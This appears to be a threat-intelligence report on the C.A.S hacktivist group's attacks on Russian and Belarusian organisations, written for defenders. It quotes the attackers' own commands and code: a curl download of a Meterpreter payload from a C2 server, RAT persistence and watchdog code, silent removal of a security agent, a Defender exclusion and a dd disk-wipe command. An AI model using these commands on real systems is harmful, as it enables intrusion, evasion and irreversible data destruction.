About C.A.S
C.A.S (Cyber Anarchy Squad) is a hacktivist group that has been attacking organizations in Russia and Belarus since 2022. Besides data theft, its goal is to inflict maximum damage, including reputational. To this end, the group’s attacks exploit vulnerabilities in publicly available services and make extensive use of free tools.
Our latest investigation unearthed new activity by the group, explored the attack stages, and analyzed the tools and malware used. In addition, we discovered links between C.A.S and other hacktivist groups, such as the Ukrainian Cyber Alliance and DARKSTAR.
Like most hacktivist groups, C.A.S uses Telegram as a platform to spread information about victims. We found a channel that posts news and messages about the group’s attacks and ideology, as well as a chat hosting a discussion of its activities.
Note: this post examines active Telegram channels that we presume to be run by hacktivist groups. Use these sources with caution.
Tactics
This section analyzes the attack chain as per the MITRE ATT&CK framework, as well as the tools we found in the current C.A.S campaign.
Initial Access
C.A.S gains initial access to targeted systems by means of the Exploit Public-Facing Application technique (T1190). The attackers compromise Jira, Confluence and Microsoft SQL Server services using vulnerabilities that we were unable to identify due to the data storage limitations of the attacked segment. However, our analysis of the group leader’s messages in the C.A.S Telegram channel suggests that the hacktivists do not use phishing emails as an initial attack vector. Instead, they likely attack vulnerable network resources or gain access to systems after their compromise by third parties.
Translation:
But I need them to let us into the network mole/fishers
The aim of the C.A.S group is to inflict maximum financial and reputational damage on organizations in Russia and Belarus. In pursuit of this goal, they likely exploit vulnerabilities not only in Jira, Confluence and MS SQL, but in other publicly available services and systems too. What’s more, we are aware of attacks carried out by C.A.S in collaboration with other groups, which is another way they gain initial access and move through victims’ infrastructure.
Translation:
but our method is to technically break through the outer perimeter, and those organizations that we need here and now often prefer to maintain 1 site, 2–3 reliable services and not poke around the network once again. so you set yourself the task to hack the company N. naturally, this is done through phishing, but unfortunately, we simply don’t have any fishers in our squad, and our arsenal is not designed for beacon flooding, but for exploits
Execution
To move further through the infrastructure, the threat actors used rare open-source remote access Trojans (RATs), including Revenge RAT and Spark RAT, which we have not seen in attacks by other hacktivists. These utilities allowed them to remotely control the infected systems and execute various commands.
In one incident, we detected the use of a compromised MS SQL service to execute commands in cmd. This was indicated by the cmd.exe process running as a child process of sqlservr.exe.
The attackers also used PowerShell to execute scripts:
powershell.exe –ex bypass –f \\[DOMAIN]\netlogon\rm.ps1 |
On top of this, the attackers downloaded the Meterpreter reverse shell for the Metasploit framework from the C2 server to the infected host using the cURL tool:
“$system32\cmd.exe”,“”$system32\cmd.exe“ /c cd %appdata% && dir && curl –O hxxp://185.117.75[.]3:8092/sdc.exe |
In some reverse shell incidents, we also found traces of Revenge RAT (48210CA2408DC76815AD1B7C01C1A21A) being run through the PowerShell process:
powershell.exe –WindowStyle Hidden –NoExit –Command [System.Reflection.Assembly]::LoadFile(‘C:\Users\ |
Persistence
To gain persistence in the system, the threat actors created accounts on compromised hosts using the net.exe utility:
C:\Windows\system32\cmd.exe” /c net user admin cas /add C:\Windows\system32\cmd.exe” /c net user admin admin123123123 /add |
It’s worth noting that they used the password
cas for the admin account, matching the name of the group.
We also found samples of Revenge RAT that had gained persistence in the system by adding registry keys to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
try { RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(“SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run”, true); try { if (!((string)((registryKey != null) ? registryKey.GetValue(“\”” + Path.GetFileNameWithoutExtension(Program._installName) + “\””) : null) == text) && registryKey != null) { registryKey.SetValue(fileNameWithoutExtension, “\”” + text + “\””); } } catch { if (registryKey != null) { registryKey.SetValue(fileNameWithoutExtension, “\”” + text + “\””); } } if (registryKey != null) { registryKey.Dispose(); } } internal static string _installName = “rpchost.exe”; |
These Trojan samples were additionally copied to the Startup folder:
internal static string _ip = “194.36.188.94”;
internal static string _installName = “svhost.exe”;
File.Copy(Application.ExecutablePath, “C:\\Users\\” + Environment.UserName + “\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\” + Program._installName);
internal static string _ip = “194.36.188.94”; internal static string _installName = “svhost.exe”; |
During execution, one of the above RAT samples (FC3A8EABD07A221B478A4DDD77DDCE43) created a watchdog timer file called svxhost.exe in the C:\Windows\System32 directory, wrote information to this file, created the NgcMngrSvc service with svxhost.exe as an executable file, and ran this service.
[HandleProcessCorruptedStateExceptions] private static void CreateWatchdog() { Program.hService = Helper.OpenService(Program.hSCM, “NgcMngrSvc”, 4); if (Program.hService == IntPtr.Zero) { try { File.WriteAllBytes(Program.system + “svxhost.exe”, Program.GetResource(“dog”)); } catch { } Program.hService = Helper.CreateService(Program.hSCM, “NgcMngrSvc”, “Microsoft Passport Manager”, 983551, 16, 2, 0, Program.system + “svxhost.exe”, null, IntPtr.Zero, null, null, null); } Helper.StartService(Program.hService, 0, null); } |
Defense Evasion
During our incident investigations, we often noted that the attackers gained full control over information security tools because these were not properly configured. To implement effective anti-attack measures, it is vital to perform regular testing, updating and integration of security systems. A key factor in securing infrastructure is compliance with password-protection policies for access to the information security systems.
In one of the incidents, C.A.S managed to disable an EPP agent without a password, using the rm.ps1 script.
if ($guid -ne $null) {
$msiexecCommand2 = “msiexec.exe /x $guid /quiet”
Start-Process -NoNewWindow -FilePath cmd -ArgumentList “/c $msiexecCommand2”
}
$guidQuery = wmic product where “[redacted]” get IdentifyingNumber $guid = $guidQuery | Select–String –Pattern “{[A-F0-9-]+}” | ForEach–Object { $_.Matches[0].Value }
if ($guid –ne $null) { $msiexecCommand2 = “msiexec.exe /x $guid /quiet” Start–Process –NoNewWindow –FilePath cmd –ArgumentList “/c $msiexecCommand2” } |
The final command to disable the EPP agent was this:
cmd.exe /c msiexec.exe /x {GUID} /quiet |
Also, as part of the Defense Evasion technique, the attackers use Revenge RAT to add the $windir\$system32 directory to the Windows Defender exclusion list. This allows the group to hide its activity, because the RAT itself and its malicious payload are both installed in this folder.
“\”$windir\\$system32\\WindowsPowerShell\\v1.0\\powershell.exe\” -WindowStyle Hidden – Command \”Add-MpPreference -ExclusionPath ‘$windir\\$system32’\”” |
And to further reduce the likelihood of detection, the attackers use a malware naming convention that mimics legitimate Windows processes:
C:\Windows\System32\svxhost.exe C:\Windows\System32\svrhost.exe C:\Windows\System32\drivers\etc\rpchost.exe C:\Windows\panther\ssbyt.exe |
Credential Access
In our study of hacktivist groups (Twelve, BlackJack, Head Mare, Crypt Ghouls and others), we often encountered the use of the same credential extraction tools, namely XenAllPasswordPro, BrowserThief and Mimikatz. These tools have long been known in the community and regularly feature in our crimeware reports.
- XenAllPasswordPro extracts passwords from system storages.
- BrowserThief compromises browser data, including autofill data and saved accounts.
- Mimikatz extracts password hashes from Windows RAM.
C.A.S is no exception: we found these tools in their attacks as well. This is yet further proof that hacktivist groups attacking Russia and Belarus tend to deploy the same arsenal of publicly available utilities.
Discovery
At the infrastructure exploration stage, the attackers made active use of various commands to collect information. Here’s a list of the commands we logged:
Command | Description |
net user | Lists all local user accounts (using net.exe) |
systeminfo | Displays detailed system information, including operating system version, installation date and patch date, as well as computer model, CPU and memory settings |
cmd ver | Displays the operating system version |
net localgroup | Displays a list of all local groups on the computer (using net.exe) |
net accounts | Displays user account settings, such as password expiration period, minimum password length and account lockout conditions (using net.exe) |
net user /domain | Displays a list of user accounts in the domain (using net.exe) |
cd %appdata% && whoami | Navigates to the %appdata% folder, then displays the name of the user executing this command |
The Revenge RAT samples also ran WMI queries to collect information about the operating system and CPU to be sent to the attackers’ command-and-control (C2) server:
SELECT * FROM Win32_OperatingSystem SELECT UserName FROM Win32_ComputerSystem SELECT * FROM WIN32_Processor |
Command and Control
To communicate with the C2 server, C.A.S uses various tools. We saw the use of reverse shells generated by the msfvenom tool for the Metasploit framework, as well as publicly available RATs.
Revenge RAT
The attackers first used Revenge RAT to establish a connection to the C2 server, then downloaded and installed the necessary payloads of various frameworks; they also collected data about the infected host and sent it to the server.
We found two similar customized samples of Revenge RAT in the attacks we investigated. Below is a full list of functions found in these variants:
FC3A8EABD07A221B478A4DDD77DDCE43 | 48210CA2408DC76815AD1B7C01C1A21A |
FilesInFolder | FilesInFolder |
Drives | Drives |
CreateFile | CreateFile |
DeleteFile | DeleteFile |
MoveFile | MoveFile |
CopyFile | CopyFile |
ArchiveFile | ArchiveFile |
UploadFile | UploadFile |
DownloadFile | DownloadFile |
ShellCommand | ShellCommand |
Uninstall | Uninstall |
ClientModel | |
DisconnectMsg | |
Ping | |
Text |
The configuration files for these samples are also similar:
FC3A8EABD07A221B478A4DDD77DDCE43 | 48210CA2408DC76815AD1B7C01C1A21A | ||||
internal static string _installName = “rpchost.exe”; private static int _port = 1337; internal static bool _install = true; internal static string _group = “cci.by2”; internal static string _startupMethod = “hklm”; internal static string _installLocation = “windir\\System32\\drivers\\etc\\”; internal static bool _installWatchdog = true; internal static bool _usePowershell = false; private static Client _client; internal static Process cmd; private static IntPtr hSCM; internal static IntPtr hService; private static string system = Environment.GetFolderPath(Environment.SpecialFolder.System) + “\\”;
|
internal static string _installName = “sysinfo”; private static int _port = 1337; internal static bool _install = true; private static Client _tcpClient; internal static Process cmd;
|
Spark RAT
As mentioned above, the group used another remote access Trojan called Spark RAT. Below is its configuration:
{ “secure”:false, “host”:“185.117.75.3”, “port”:9610, “path”:“/”, “uuid”:“3917b41****”, “key”:“aa494c90****” } |
From the IP address specified in the configuration, the attackers downloaded the Meterpreter payload to the victim’s device.
Alongside this, Spark RAT automatically collects and sends the following system information to the C2 server:
Trojan function | Description |
id | Unique device identifier |
runtime.GOOS | Information about the operating system in which the RAT is running |
runtime.GOARCH | CPU architecture |
localIP | Local IP address of the device |
macAddr | MAC address of the network interface of the device |
cpuInfo | CPU information |
ramInfo | Amount of RAM |
netInfo | General information about network connections |
diskInfo | Information about disk drives |
uptime | System uptime since the last boot |
hostname | Device name |
username | Name of the current user |
Spark RAT provides the operator with a wide range of commands to control the target device. These commands allow both basic operations (such as PING to check client availability, SHUTDOWN to turn off the device, and RESTART to reboot it) as well as more complex ones, such as remote file management (FILES_LIST, FILES_FETCH, FILES_UPLOAD), terminal interaction (TERMINAL_INIT, TERMINAL_INPUT, TERMINAL_RESIZE) and remote desktop access (DESKTOP_INIT, DESKTOP_SHOT). Also available to the operator are commands to manage processes (PROCESSES_LIST, PROCESS_KILL) and execute system commands (COMMAND_EXEC).
Meterpreter
In one of the incidents, we found a Meterpreter reverse shell (6CBC93B041165D59EA5DED0C5F377171). Using this, the group was able to gain full access to the compromised system and do the following:
- Remotely manage the file system;
- Intercept network traffic;
- Log keystrokes;
- Extract password hashes;
- Perform pivoting techniques through compromised hosts;
- Monitor the webcam and microphone.
The reverse shell contains the following C2 server address and port:
Impact
To cause damage to victims, the group encrypts their infrastructure. As we’ve noted before in similar hacktivist attacks, the threat actors’ arsenal consists of leaked LockBit ransomware builders for Windows systems and Babuk for Linux systems. In the majority of C.A.S attacks, encrypted file extensions are generated randomly; but sometimes the number 3119 appears both in the name of the executable file of the ransomware Trojan, and in the extensions added to encrypted files. This number often crops up in C.A.S activity — we see it in usernames, ransom notes, encrypted file extensions and group-related merchandise. It is not a random sequence of digits, but represents the positions of the letters C, A, and S in the alphabet: C is 3, A is 1 and S is 19.
One of the group’s ransomware samples is named 3119.exe. In our investigation of a C.A.S attack involving this sample, we found a ransom note displayed after file encryption in the system:
Besides encryption, the attackers can destroy data in different segments of the victim’s network or on specific servers. To do this, they first collect information about attached drives using the df system utility:
Then, to destroy the data, they use the dd system utility, which executes /dev/zero — a file that generates an endless stream of null bytes. The attackers copy null bytes from /dev/zero to the /dev/[VOLUME] partition of their choice in 4 MB blocks. This overwrites the data in the partition with zeros, wiping it forever.
dd if=/dev/zero of=/dev/[VOLUME] bs=4M |
This operation allows the attackers to irreversibly destroy data on the victim’s servers.
On Telegram, the perpetrators often confirm their destructive impact on victims’ infrastructure. In their posts, they describe what they did and attach screenshots with the results of their operations. Which part of the infrastructure to encrypt and which to destroy immediately is the attackers’ choice: it depends on the situation.
Translation:
Context: these servers have been down for 3 days, one was erased (namely the volumes with data), the second was encrypted (only the directories with data). Today they were wiped to the root.
Victims
C.A.S targets companies from Russia and Belarus in various industries, including government and commercial organizations, entertainment and technology firms, telecommunications companies and industrial enterprises. This suggests that victims are chosen based on their location, regardless of their field of activity.
The group often writes about its victims on Telegram, posting screenshots of infrastructure, stolen documents and links to cloud storages or forums offering stolen data for download.
Connections to other groups
As mentioned above, besides its Telegram channel, C.A.S hosts a public chat where group members and followers actively communicate. Interestingly, the chat administrators belong not only to C.A.S, but to related groups; one of them, who goes by the name of Sean Townsend, is an administrator of the hacktivist group RUH8 and the press secretary of the Ukrainian Cyber Alliance (U.C.A).
In its Telegram channel, C.A.S states that it sometimes works with other groups that share its mission to attack organizations from Russia and Belarus. For example, we found posts about joint attacks by C.A.S with U.C.A, RUH8, RM-RF and others:
Translation:
Thanks to colleagues who helped with the last attack
While investigating an incident in the infrastructure of one C.A.S victim, we also found traces of compromise pointing to the DARKSTAR group (also known by the names Shadow and Comet). In one incident, we discovered the following files:
These findings are further evidence of a connection between groups targeting Russian organizations. As part of their collaboration, group members likely share access to victims’ infrastructure, C2 infrastructure and tools. They also exchange information about attacks on Telegram as a way to increase campaign visibility, discredit victims and inflict reputational damage.
Takeaways
The C.A.S group poses a serious threat to organizations in Russia and Belarus. The threat actors attack key industries using an array of tools and techniques that we have observed in the campaigns of other hacktivist groups. C.A.S attacks utilize rare RATs, publicly available remote management tools, and a range of vulnerability exploitation methods. In addition, the group spreads information about its attacks through a public Telegram channel, which causes both financial and reputational damage to victims. A more detailed analysis of C.A.S attacks is available to our Threat Intelligence subscribers.
The group openly confirms that it actively collaborates with other attackers targeting Russia. Joint actions and use of a common infrastructure point to the emergence of a sophisticated attack ecosystem, in which hacktivist groups share resources, tools and access to improve efficiency and scale operations. This strategy not only complicates attribution, but significantly increases the destructive potential of attacks.
To effectively counter such groups, it is vital to harden system defenses, apply regular updates to cybersecurity tools and leverage data analytics for monitoring relevant threat activity. It is also critically important to follow best practices when configuring your information security systems. We strongly recommend the following guides:
Following these instructions will minimize the risks of compromise and increase your system’s resistance to possible attacks.
Indicators of compromise
Revenge RAT
Spark RAT
Meterpreter
File path
C:\windows\System32\svxhost.exe
C:\Windows\system32\svrhost.exe
C:\Windows\System32\drivers\etc\rpchost.exe
C:\Windows\panther\ssbyt.exe
C:\Users\[USERNAME]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.exe